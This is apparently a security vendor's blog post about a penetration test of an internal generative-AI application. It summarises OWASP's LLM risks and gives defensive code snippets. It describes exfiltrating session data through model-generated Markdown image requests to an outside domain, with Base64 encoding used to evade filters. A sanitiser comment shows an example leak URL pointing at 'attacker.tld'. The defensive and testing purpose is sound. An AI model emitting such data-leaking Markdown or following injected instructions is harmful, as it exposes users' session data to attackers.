Navigating AI Security: Insights from a Generative AI Pen Test

Generative AI represents a significant milestone in technological innovation, pushing the boundaries of what machines are capable of across various domains. These AI models, with their ability to generate everything from text and images to code, symbolize a major advancement in automation, efficiency, and the capability of machines to learn, create, and aid in decision-making. Their integration into fields such as professional services, healthcare, and entertainment highlights the transformative impact of generative AI, promising to revolutionize these sectors with unprecedented levels of intelligence and creativity. 

However, the deployment of generative AI is not without its challenges, with security risks being among the most critical concerns. The sophisticated capabilities that allow generative AI to produce human-like text and creative content also open new vulnerabilities and exploitation avenues. Addressing the security of generative AI applications is thus of utmost importance, requiring a deep understanding of these potential risks and the implementation of effective strategies to safeguard against them. This necessity underscores the complexity of generative AI systems and the imperative to prioritize their security to fully realize their potential while minimizing associated risks. 

Recognizing the importance of security in the context of generative AI, the OWASP Foundation has highlighted the top 10 security vulnerabilities specific to Large Language Models (LLMs). This framework aids in comprehending and tackling these vulnerabilities, which range from prompt injection and training data poisoning to insecure output handling. Penetration testing becomes an indispensable strategy in this scenario, offering a proactive approach to identifying and addressing security weaknesses. By simulating cyberattacks, penetration testing enables the evaluation and fortification of generative AI applications against malicious exploits, ensuring their safe and effective deployment in a rapidly evolving technological landscape.

Generative AI Security Risks

The adoption of generative AI applications is on the rise, bringing a new era of technological capabilities. However, this rapid integration has brought to light significant security risks, underscoring the necessity for a comprehensive understanding and proactive measures to safeguard these systems. 

One of the most pressing challenges is the unique vulnerabilities intrinsic to Large Language Models (LLMs). The OWASP Foundation has delineated these vulnerabilities in its top 10 security risks for LLM applications, providing a crucial blueprint for identifying and mitigating potential threats​. 

OWASP Top 10 for LLM

Prompt Injection 

This involves manipulation of a Large Language Model through crafty inputs, leading to unintended actions. It includes direct injections that overwrite system prompts and indirect ones that manipulate inputs from external sources. 

  • Direct prompt injection: using malicious prompts directly within the chatbot. 

  • Indirect prompt injection: uploading or calling malicious images, documents, or websites to the chatbot. 

  • Invisible prompt injection: using encoded Unicode characters containing malicious instructions. 
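As an illustrative defence against the invisible variant, the sketch below (Python, with hypothetical helper names) screens user input for Unicode tag-block characters (U+E0000 to U+E007F), a range abused for invisible prompt injection because it renders as nothing on screen yet is still consumed by many model tokenizers:

```python
# Hypothetical pre-processing filter for invisible prompt injection.
# The Unicode "tag" block renders invisibly but can smuggle instructions.
TAG_BLOCK = range(0xE0000, 0xE0080)

def contains_invisible_payload(text: str) -> bool:
    """Return True if the text hides characters from the Unicode tag block."""
    return any(ord(ch) in TAG_BLOCK for ch in text)

def strip_invisible(text: str) -> str:
    """Remove tag-block characters before the prompt reaches the model."""
    return "".join(ch for ch in text if ord(ch) not in TAG_BLOCK)
```

A real deployment would likely extend the filter to other invisible code points (zero-width spaces, bidirectional controls) rather than the tag block alone.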

Insecure Output Handling 

Occurs when LLM outputs are accepted without proper scrutiny, potentially exposing backend systems to attacks like XSS, CSRF, SSRF, privilege escalation, or remote code execution. 
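A minimal illustration of the principle, assuming the application renders model output in a web page: treat the output as untrusted and escape it before display. The function name is hypothetical.

```python
import html

def render_llm_output(raw: str) -> str:
    """Hypothetical helper: treat model output like any untrusted user
    input and HTML-escape it before it reaches the browser, so an
    injected <script> tag is displayed as text rather than executed."""
    return html.escape(raw)
```

The same care applies when model output feeds a shell, SQL query, or template engine: encode or parameterise for the specific downstream context rather than passing the text through verbatim.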

Training Data Poisoning 

Happens when the training data for LLMs is tampered with, introducing vulnerabilities or biases that can compromise security, effectiveness, or ethical behavior of the model. 

Model Denial of Service 

Attackers can cause LLMs to perform resource-heavy operations, leading to service degradation or incurring high costs, exploiting the resource-intensive nature and unpredictability of user inputs. 
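One simple guard, sketched below with an assumed per-request character budget, is to reject oversized prompts before they ever reach the resource-intensive (and billed) model call:

```python
MAX_INPUT_CHARS = 4_000  # hypothetical per-request budget; tune per model

def guard_request(prompt: str) -> str:
    """Reject oversized prompts before the expensive model call is made."""
    if len(prompt) > MAX_INPUT_CHARS:
        raise ValueError("prompt exceeds per-request size budget")
    return prompt
```

A size cap alone does not stop a flood of small requests, so it is usually paired with per-client rate limiting.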

Supply Chain Vulnerabilities 

The lifecycle of LLM applications can be compromised by vulnerable components or services, introducing security risks through third-party datasets, pre-trained models, and plugins. 

Sensitive Information Disclosure 

LLMs may inadvertently reveal confidential data in their responses, posing risks of unauthorized data access, privacy violations, and security breaches. 

Insecure Plugin Design 

Plugins for LLMs can have insecure inputs and insufficient access control, making them susceptible to exploitation and potentially leading to serious consequences like remote code execution. 

Excessive Agency 

When Large Language Models (LLMs) interact with other systems, giving them unrestricted control can result in unwanted operations and behaviours. Similar to web applications, it is not advisable for LLMs to regulate themselves. Instead, safeguards should be integrated directly into the APIs. 
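The principle can be sketched as an API-side allowlist check: the model may request an action, but the downstream service decides whether it runs. The action names and handler below are illustrative, not from the tested application.

```python
# Hypothetical API-side guard: the model may *request* actions, but the
# downstream service enforces its own allowlist instead of trusting the
# model to police itself.
ALLOWED_ACTIONS = {"read_document", "summarise_document"}

def execute_model_action(action: str) -> str:
    """Run a model-requested action only if it is explicitly permitted."""
    if action not in ALLOWED_ACTIONS:
        raise PermissionError(f"model requested disallowed action: {action!r}")
    # ... dispatch to the real handler for the action here ...
    return f"executed {action}"
```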


Overreliance 

Overdependence on LLMs without proper oversight can result in misinformation, miscommunication, legal issues, and security vulnerabilities from incorrect or inappropriate content generated by the models. 

Model Theft 

Involves unauthorised access, copying, or exfiltration of proprietary LLM models, leading to economic losses, compromised competitive advantage, and potential exposure of sensitive information. 


Addressing the Risks 

Mitigating these risks requires a multi-faceted approach, including robust validation processes, secure coding practices, and continuous security testing. Developers and security teams must be vigilant, employing strategies such as privilege control, input validation, and secure plugin design to protect against these vulnerabilities​. 

The penetration testing of a generative AI application, as conducted by ProCheckUp, exemplifies the critical role of security assessments in identifying and addressing these risks. By simulating potential attack scenarios, pen testers can uncover vulnerabilities that might not be evident during standard security audits, thereby enabling developers to fortify their applications against real-world threats. 

As generative AI continues to evolve, so too will the landscape of associated security risks. Staying informed and proactive in addressing these challenges is essential for the safe and secure deployment of generative AI technologies. 

Project Introduction and Penetration Testing Methodology by ProCheckUp

Recently, ProCheckUp had the opportunity to conduct a comprehensive penetration test on a generative AI application for a world-leading professional services consultancy. This project represented a significant step forward in understanding and securing generative AI technologies, particularly those integrating cutting-edge models like OpenAI's GPT-3.5 and GPT-4, along with Google's Bison models. Designed for internal use, the application sought to explore the potential of generative AI within a safe and secure environment, using base models without additional training or fine-tuning. 

The Significance of the Project 

The consultancy's initiative to subject its generative AI application to a penetration test underscores the growing recognition of security as a cornerstone in the deployment of AI technologies. Given the application's reliance on prominent AI models for internal experimentation, ensuring its security was paramount to safeguarding sensitive data and maintaining operational integrity. 

PCU's Methodology

ProCheckUp's approach to penetration testing this generative AI application was methodical and tailored to address the unique challenges posed by AI technologies. In addition to the standard testing procedures, ProCheckUp implemented context-aware testing strategies to further enhance the security evaluation. This involved simulating real-world scenarios and utilising AI-specific threat models to identify vulnerabilities that could be exploited in a practical context. 

By integrating context-aware testing, the team first tested the underlying infrastructure, the application, and API calls being made when interacting with these models. This initial phase provided crucial insights into the security posture of the entire ecosystem, laying a solid foundation for subsequent, more focused testing of the generative AI models. With this comprehensive approach, ProCheckUp was able to uncover subtle security issues that standard testing methods might overlook, offering a more detailed understanding of the application's resilience against sophisticated attacks. 

The methodology encompassed several key phases:

1. Pre-Assessment 

Initially, the team engaged in a comprehensive pre-assessment phase to understand the application's architecture, the AI models involved, and the specific functionalities intended for internal use. This phase was crucial for identifying potential areas of vulnerability and planning the penetration testing strategy.

2. Risk Analysis 

Leveraging insights from the OWASP top 10 for LLMs, the team conducted a detailed risk analysis to prioritize vulnerabilities that could potentially impact the application. This included assessing the risk of prompt injection, insecure output handling, training data poisoning, and other vulnerabilities unique to generative AI applications.  

3. Testing and Exploitation 

The core of the methodology involved simulated cyberattacks to identify vulnerabilities. This phase tested the application's resilience against various attack vectors, including those identified in the risk analysis phase. Special attention was given to exploiting the unique aspects of generative AI, such as manipulating inputs to test for prompt injection vulnerabilities.

4. Analysis and Reporting

Following the testing phase, ProCheckUp analysed the findings to compile a comprehensive report detailing the vulnerabilities discovered, their potential impact, and recommended countermeasures. This report served as a roadmap for the consultancy to enhance the security of their generative AI application.

5. Remediation and Follow-Up 

ProCheckUp also provided guidance on remediating the identified vulnerabilities, emphasizing best practices for securing generative AI applications. A follow-up assessment was proposed to ensure all vulnerabilities were addressed and to validate the effectiveness of the remediation efforts. 

Through this rigorous methodology, ProCheckUp not only highlighted the specific risks associated with generative AI applications but also demonstrated the importance of specialised penetration testing approaches for these advanced technologies. The insights gained from this project are invaluable for developers and security professionals alike, offering a blueprint for securing generative AI applications against an evolving landscape of cyber threats.

Risks Identified and Defensive Recommendations

During the penetration test conducted by ProCheckUp on the generative AI application for a world-leading professional services consultancy, several key security risks were identified, reflecting the vulnerabilities inherent in generative AI technologies as outlined by OWASP's top 10 for LLMs. These findings underscored the necessity for targeted defensive strategies to mitigate these risks effectively. 

Data Exfiltration via Markdown 

During this engagement, a significant finding was the identification of a security vulnerability by ProCheckUp in the way the models handled Markdown text. This vulnerability was uncovered through tests aimed at extracting session data via GET requests directed to a domain under our control. It was also discovered that the extracted data could be encoded, using methods such as Base64, to sidestep any security protocols currently implemented. This encoding technique made it possible to conceal the data in transit, thereby increasing the risk of unauthorised data access. 

Defensive Recommendation 

To address this vulnerability, developers are recommended to implement rigorous input validation and sanitization processes specifically for Markdown text processing. This involves ensuring that all Markdown input is thoroughly checked for malicious content before being processed or rendered. Additionally, developers should employ encoding detection mechanisms to identify and block or properly handle encoded data, such as Base64, that is attempting to bypass security measures. 
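A heuristic for the encoding-detection step might look like the following sketch, which flags long Base64-looking runs that actually decode. The function name and length threshold are illustrative, and false positives are possible, so a hit should be treated as a signal rather than proof.

```python
import base64
import re

# Matches long runs of Base64-alphabet characters (illustrative threshold).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def contains_base64_payload(text: str) -> bool:
    """Heuristic check: flag long Base64-looking runs that decode cleanly,
    a common trick for smuggling data past keyword-based filters."""
    for match in B64_RUN.finditer(text):
        candidate = match.group()
        padded = candidate + "=" * (-len(candidate) % 4)  # pad to multiple of 4
        try:
            base64.b64decode(padded, validate=True)
            return True
        except ValueError:  # binascii.Error subclasses ValueError
            continue
    return False
```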

If there is no essential business requirement for rendering Markdown text, a more straightforward and effective mitigation strategy would be to disable Markdown rendering altogether. This approach eliminates the vulnerability by removing the feature that exposes the system to potential exploits. 

Furthermore, implementing Content Security Policy (CSP) headers can further mitigate the risk of unauthorized data exfiltration by restricting the domains to which data can be sent. By taking these proactive measures, including the option to disable Markdown rendering when not needed, developers can significantly enhance the security of their applications against such vulnerabilities. 
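As one way to combine these ideas, the sketch below strips Markdown images whose host is not on an allowlist before rendering, so an injected image URL can no longer carry session data to an attacker-controlled domain. The allowlisted host and helper names are hypothetical.

```python
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"assets.example.com"}  # hypothetical allowlist

MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

def sanitise_markdown(md: str) -> str:
    """Drop Markdown images whose host is not allowlisted, so a
    model-injected ![x](https://attacker.tld/?d=<data>) never fires
    a data-leaking GET when the chat transcript is rendered."""
    def _replace(match: re.Match) -> str:
        host = urlparse(match.group(2)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else match.group(1)
    return MD_IMAGE.sub(_replace, md)
```

Server-side filtering of this kind complements, rather than replaces, a CSP `img-src` restriction enforced by the browser.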

Model Denial of Service (DoS) 

Simulated attacks conducted during the security testing phase revealed that the application was susceptible to Denial of Service (DoS) attacks. These attacks could significantly degrade the application's performance or lead to incurring excessive operational costs. The vulnerability was exposed when the AI model was overloaded with resource-intensive queries, demonstrating that attackers could exploit this weakness to disrupt service availability. By bombarding the AI with such queries, the system's resources could be monopolized, resulting in slowed response times for legitimate users or even a complete service shutdown. 

Defensive Recommendation 

To protect against Model DoS attacks, it's essential to monitor resource usage closely and implement rate limiting where necessary. This can help prevent service degradation and manage operational costs effectively. 
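Rate limiting of this kind is often implemented as a token bucket; a minimal per-client sketch follows (the class name and parameters are illustrative):

```python
import time

class TokenBucket:
    """Minimal rate limiter: each request spends one token; tokens
    refill at `rate` per second up to `capacity`."""

    def __init__(self, rate: float, capacity: int):
        self.rate = rate
        self.capacity = capacity
        self.tokens = float(capacity)
        self.last = time.monotonic()

    def allow(self) -> bool:
        """Return True if the request may proceed, False if throttled."""
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False
```

In production the buckets would typically be keyed per user or API token and persisted in a shared store; the in-memory version above only illustrates the accounting.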

These recommendations are pivotal for securing generative AI applications, providing a foundation for developers to enhance the resilience of their systems against emerging cyber threats. By addressing the vulnerabilities identified through penetration testing, organisations can ensure the safe and secure deployment of generative AI technologies. 

Advice for Generative AI Application Developers

The penetration test conducted on a generative AI application has illuminated several key areas of concern but, more importantly, has offered invaluable insights into how developers can fortify their applications against potential security threats.  

Here are essential practices and considerations for developers working on generative AI applications: 

  • Prioritise security: integrate threat modelling, security testing, and code reviews early and often throughout the development lifecycle. 

  • Address AI-specific vulnerabilities: understand and mitigate the weaknesses unique to generative AI technologies, as highlighted by OWASP's top 10 for LLMs. 

  • Enforce strict input validation and sanitisation: protect against prompt injection and insecure output handling. 

  • Protect training data and models: ensure their integrity to prevent poisoning, and vet the security of third-party resources. 

  • Implement a zero-trust architecture: safeguard against supply chain attacks, including regular security assessments of third-party components. 

  • Design for resilience against Denial of Service (DoS) attacks: apply rate limiting and monitor resource usage. 

  • Stay current: track cybersecurity trends, vulnerabilities, and best practices, and regularly update applications to address known issues. 

  • Conduct routine penetration testing: identify hidden vulnerabilities and assess the effectiveness of security measures. 

  • Promote a culture of security awareness: educate and train development teams and the wider organisation. 

By following these recommendations, developers can significantly bolster the security and resilience of generative AI applications against a dynamic landscape of cyber threats. This approach, informed by comprehensive penetration testing and expert insights, offers a strategic framework for protecting generative AI technologies. 


Conclusion

The penetration test conducted by ProCheckUp on this generative AI application revealed crucial security vulnerabilities, underlining the necessity of robust security measures tailored to these advanced technologies. Key issues such as data exfiltration via Markdown and model denial of service were identified, aligning with the OWASP top 10 for LLM vulnerabilities. Recommendations for mitigating these risks include enhanced input validation, secure training data management, and a zero-trust architecture for supply chain security, offering clear strategies for strengthening defences. 

Developers are encouraged to embed security practices throughout the development lifecycle, stay updated on the latest security vulnerabilities, and foster a culture of security awareness. This proactive stance is vital for enhancing the resilience of generative AI applications against emerging cyber threats. The evolution of generative AI technologies necessitates a continuous and evolving approach to security, characterized by a commitment to adaptation and vigilance. 

The role of cybersecurity professionals, developers, and organizations in securing generative AI applications is critical as these technologies become increasingly integrated into various sectors. The insights gained from penetration tests like ProCheckUp's are invaluable, driving the secure advancement of generative AI. Emphasizing a comprehensive approach to security can ensure that the transformative potential of generative AI is realized safely and beneficially. 

Contact ProCheckUp today to explore risks in your generative AI applications.